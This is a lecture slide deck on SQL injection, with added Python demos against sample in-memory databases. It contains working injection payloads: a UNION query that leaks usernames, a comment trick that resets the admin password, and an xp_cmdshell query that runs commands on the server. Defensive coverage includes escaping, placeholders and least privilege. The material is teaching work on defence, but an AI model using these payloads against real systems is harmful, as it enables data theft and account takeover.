SQL Injection
Anthony Brown
March 4, 2008

Outline
- Background of SQL Injection
- Techniques and Examples
- Preventing SQL Injection
- Demo
- Wrap-Up
- Questions

Background of SQL Injection

Databases: Where are they now?

                  Fat Server   Fat Client   Fat Server & Fat Client
  Mainframes          X
  Desktop Apps                     X
  Web Apps                                          X

Why is SQL a standard?
- Relational database
- Platform independence
- Loose semantics
- Runtime interpretation

Flexibility = Vulnerability
- Simple injection
- Decoding error messages
- Blind injection
- Encoding exploits
- Stored procedures
- Programmer error (faulty logic)

SQL Injection Techniques

Important Symbols
- '      "Hack": closes the string literal the application opened, so whatever follows in the input is parsed as SQL
- --     "Comment out": everything to the end of the line is ignored, which discards the rest of the application's query (MySQL requires a space after the two dashes)
- ;      "End statement": terminates the current statement so a second one can be stacked, if the driver allows multiple statements per call
- %, *   "Wildcards": % matches any characters in a LIKE pattern; * selects every column

SQL Injection Definition
User input is crafted so that the query the application builds from it returns, or modifies, data the application never intended. The query skeleton the attacker is completing is the familiar one:
  SELECT <columns> FROM <table> WHERE <condition>

Example: Database Schema
- Table Users
  – Has columns "username" and "password"
  – Accessed when users log in
- Table Customers
  – Has column "phone"
  – Users can look up other customers' phone numbers by name
- The application does no input validation

Returning Extra Rows with "union"
Query:
  SELECT phone FROM Customers WHERE last_name = '<input>'
Input:
  x' UNION SELECT username FROM users WHERE 'x' = 'x
Resulting query:
  SELECT phone FROM Customers WHERE last_name = 'x' UNION SELECT username FROM users WHERE 'x' = 'x'
The first SELECT matches nothing; the second appends every username to the result set. The trailing 'x' = 'x reuses the application's own closing quote so the statement stays syntactically valid. A UNION only works when both SELECTs return the same number of columns of compatible types, which is why the injected SELECT names exactly one column.

Modifying Records
The application has a password-changing page.
SQL:
  UPDATE users SET password = '<new password>' WHERE username = '<current user>'
Input (as the new password):
  newpassword' WHERE username LIKE '%admin%' --
Resulting query:
  UPDATE users SET password = 'newpassword' WHERE username LIKE '%admin%' --' WHERE username = '<current user>'
The injected WHERE selects the admin account and the comment marker discards the application's own WHERE clause, so an ordinary user resets the administrator's password.
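The two attacks on the preceding slides, run end to end. This is an added example, not part of the original presentation: it builds the slides' Users and Customers tables in an in-memory SQLite database with constructed sample rows (the presentation does not name a DBMS), concatenates input into the query exactly as the slides describe, and feeds in the two payloads above.

```python
import sqlite3

# Constructed sample data matching the slides' schema. Not from the presentation.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE customers (last_name TEXT, phone TEXT);
        INSERT INTO users VALUES ('admin', 's3cret'), ('alice', 'hunter2');
        INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0101');
    """)
    return conn


def build_lookup_sql(last_name: str) -> str:
    # String concatenation as on the slide: the input lands inside the quotes,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    return "SELECT phone FROM customers WHERE last_name = '" + last_name + "'"


def lookup_phone_vulnerable(conn: sqlite3.Connection, last_name: str) -> list:
    return [row[0] for row in conn.execute(build_lookup_sql(last_name))]


def change_password_vulnerable(conn: sqlite3.Connection, username: str,
                               new_password: str) -> None:
    sql = ("UPDATE users SET password = '" + new_password +
           "' WHERE username = '" + username + "'")
    conn.execute(sql)
    conn.commit()


# The slides' payloads, verbatim.
UNION_PAYLOAD = "x' UNION SELECT username FROM users WHERE 'x' = 'x"
PASSWORD_PAYLOAD = "newpassword' WHERE username LIKE '%admin%' --"


def run_attacks() -> dict:
    conn = make_db()
    result = {
        "normal": lookup_phone_vulnerable(conn, "Smith"),
        # No customer is named 'x', so every row returned comes from the
        # injected SELECT against the users table.
        "leaked": lookup_phone_vulnerable(conn, UNION_PAYLOAD),
    }
    # Alice submits the payload as her new password; the injected WHERE
    # redirects the UPDATE to the admin row and "--" drops the real WHERE.
    change_password_vulnerable(conn, "alice", PASSWORD_PAYLOAD)
    passwords = dict(conn.execute("SELECT username, password FROM users"))
    result["admin_password"] = passwords["admin"]
    result["alice_password"] = passwords["alice"]
    return result


if __name__ == "__main__":
    print(build_lookup_sql(UNION_PAYLOAD))
    print(run_attacks())
```

SQLite's `sqlite3.execute` refuses stacked statements, so the `;`-based technique on the SQL Server slides below would not work here; the UNION and comment-marker techniques need only a single statement and work on every mainstream DBMS.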

MS SQL Server
- Default SQL Server setup (older installs, SQL Server 2000 and earlier)
  – Default system administrator account "sa" enabled
  – No password!
- Supports multiple queries in one batch (stacked statements)
- "Extended stored procedures": C/C++ DLL files
  – Read/write external files
  – Access the command line

Exploiting SQL Server
Use the phone look-up query again:
  SELECT phone FROM customers WHERE last_name = '<input>'
Input:
  '; exec master..xp_cmdshell 'iisreset'; --
Resulting batch:
  SELECT phone FROM customers WHERE last_name = ''; exec master..xp_cmdshell 'iisreset'; --'
The first statement returns nothing; the second runs iisreset on the database host's command line. This needs three things at once: a driver that sends the batch as-is, a connection with sysadmin rights (as "sa" has), and xp_cmdshell available. Since SQL Server 2005 xp_cmdshell is disabled by default and must be enabled with sp_configure, but a sysadmin connection can do that from within the same injection.

Preventing SQL Injection

- Input validation
- Input checking functions
- Access rights
- User permissions
- Variable placeholders
- Stored procedures

Input Validation
- Checks
  – Type
  – Size
  – Format
  – Range
- Replace quotation marks
- "All input is wrong and dangerous"

Input Checking Functions
Built-in character escaping. The first line is the vulnerable original; the second escapes the value, and the quotes around it must stay in place, because escaping only protects a value that sits inside a string literal:
  $sql = "SELECT * FROM Users WHERE ID = '" . $_GET['id'] . "'";                                   // vulnerable
  $sql = "SELECT * FROM Users WHERE ID = '" . mysql_real_escape_string($_GET['id']) . "'";       // escaped, still quoted
  $result = mysql_query($sql);
(The mysql_* extension was removed in PHP 7; the equivalent is mysqli_real_escape_string($link, $value), which needs the connection handle.) If the quotes are dropped, as in an unquoted numeric comparison, the escaping function has nothing to escape and an input such as 1 OR 1=1 passes straight through.
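What escaping does and does not cover, as an added example that is not from the presentation. It uses an in-memory SQLite table with constructed rows and a standard-SQL escaper (doubling single quotes; MySQL's mysql_real_escape_string backslash-escapes instead, but the limitation shown is the same): with the value inside quotes the classic quote-based payload is neutralised, while the unquoted form of the slide's second line is bypassed by a payload that contains no quote at all.

```python
import sqlite3


def make_users() -> sqlite3.Connection:
    # Constructed sample table; not from the presentation.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT);
        INSERT INTO users VALUES (1, 'alice'), (2, 'bob'), (3, 'admin');
    """)
    return conn


def sql_escape(value: str) -> str:
    # Standard-SQL string escaping: a quote inside a literal is written as ''.
    # It only has meaning when the result is placed between quotes.
    return value.replace("'", "''")


def find_quoted_escaped(conn: sqlite3.Connection, user_id: str) -> list:
    # Escaped AND quoted: the whole input stays one string literal.
    sql = "SELECT name FROM users WHERE id = '" + sql_escape(user_id) + "'"
    return [row[0] for row in conn.execute(sql)]


def find_unquoted_escaped(conn: sqlite3.Connection, user_id: str) -> list:
    # Escaped but NOT quoted, like the slide's second line: there is no
    # literal for the escaper to protect, so bare SQL in the input is parsed.
    sql = "SELECT name FROM users WHERE id = " + sql_escape(user_id)
    return [row[0] for row in conn.execute(sql)]


QUOTE_PAYLOAD = "1' OR '1'='1"   # needs a quote to break out: escaping defeats it
NUMERIC_PAYLOAD = "1 OR 1=1"     # no quote to escape: only quoting defeats it


if __name__ == "__main__":
    conn = make_users()
    print(find_quoted_escaped(conn, QUOTE_PAYLOAD))      # []
    print(find_unquoted_escaped(conn, NUMERIC_PAYLOAD))  # every user
```

SQLite's integer affinity makes `id = '1'` match row 1 the same way MySQL's implicit conversion would, so the quoted form still works for legitimate numeric ids; the real fix for numeric columns is casting to int (a type check, as the previous slide lists) or a placeholder.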

Access Rights
Web user vs. system administrator ('sa'): the web application should connect with its own low-privilege database account, never as 'sa'. An injection then runs with the web account's rights rather than the server's.

User Permissions
- Limit query access rights
  – SELECT
  – UPDATE
  – DROP
- Restricted statement access
  – Global-specific
  – Database-specific
  – Table-specific

Variable Placeholders (?)
- Defence against string concatenation: the value is sent separately from the SQL text and is never re-parsed as SQL
- Enforcing database data types
  PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD = ?");
  prep.setString(1, pwd);
  ResultSet rs = prep.executeQuery();
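The same two operations from the techniques section rewritten with placeholders, as an added example that is not from the presentation (Python's sqlite3 rather than the slide's JDBC, with constructed sample rows). The slide payloads become ordinary values: the UNION lookup matches no customer and the password payload is stored as Alice's literal password while the admin row is untouched. The block also shows the one thing placeholders cannot do, which the slide does not mention: bind identifiers such as an ORDER BY column, which need an allow-list instead.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data matching the slides' schema.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE customers (last_name TEXT, phone TEXT);
        INSERT INTO users VALUES ('admin', 's3cret'), ('alice', 'hunter2');
        INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0101');
    """)
    return conn


def lookup_phone(conn: sqlite3.Connection, last_name: str) -> list:
    # The SQL text is fixed; last_name is bound as a value, quotes and all.
    cur = conn.execute("SELECT phone FROM customers WHERE last_name = ?",
                       (last_name,))
    return [row[0] for row in cur]


def change_password(conn: sqlite3.Connection, username: str,
                    new_password: str) -> int:
    cur = conn.execute("UPDATE users SET password = ? WHERE username = ?",
                       (new_password, username))
    conn.commit()
    return cur.rowcount  # rows actually changed


# Placeholders bind values only. Column and table names are not values,
# so anything user-controlled there must be checked against an allow-list.
ALLOWED_SORT_COLUMNS = ("last_name", "phone")


def is_safe_sort_column(name: str) -> bool:
    return name in ALLOWED_SORT_COLUMNS


def list_customers(conn: sqlite3.Connection, sort_by: str) -> list:
    if not is_safe_sort_column(sort_by):
        raise ValueError("unsupported sort column: %r" % sort_by)
    cur = conn.execute("SELECT last_name FROM customers ORDER BY " + sort_by)
    return [row[0] for row in cur]


UNION_PAYLOAD = "x' UNION SELECT username FROM users WHERE 'x' = 'x"
PASSWORD_PAYLOAD = "newpassword' WHERE username LIKE '%admin%' --"


def run_defended() -> dict:
    conn = make_db()
    rows_changed = change_password(conn, "alice", PASSWORD_PAYLOAD)
    passwords = dict(conn.execute("SELECT username, password FROM users"))
    return {
        "union_lookup": lookup_phone(conn, UNION_PAYLOAD),
        "rows_changed": rows_changed,
        "admin_password": passwords["admin"],
        "alice_password": passwords["alice"],
    }


if __name__ == "__main__":
    print(run_defended())
```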

Stored Procedures
- Use error-checking variables
- Buffer direct database access: the application calls the procedure with parameters instead of sending SQL text
- Caveat: a procedure that builds its own SQL string from its parameters (dynamic SQL) is just as injectable as the application code it replaced; the benefit comes only when parameters are used as values throughout

Demonstration

Conclusions
- SQL Injection continues to evolve with new technologies
- Dangerous effects
  – Access to critical information
  – Updating data not meant to be updated
  – Exploiting the DBMS to directly affect the server and its resources
- Prevention of SQL Injection
  – Input validation and query building
  – Permissions and access rights
  – Variable placeholders (prepare) and stored procedures

Questions
1) What could prevent the 'Students' table from being dropped?
2) What is another way to prevent injection?

Questions?

References
- Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. PHP Documentation Group, 13 January. Accessed 07 Apr.
- Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt.
- "Exploits of a Mom." xkcd.com. 4 Mar.
- Finnigan, Pete. "SQL Injection and Oracle, Part One." SecurityFocus, 21 November. Accessed Apr.
- Harper, Mitchell. "SQL Injection Attacks: Are You Safe?" Dev Articles, 29 May. Accessed Apr.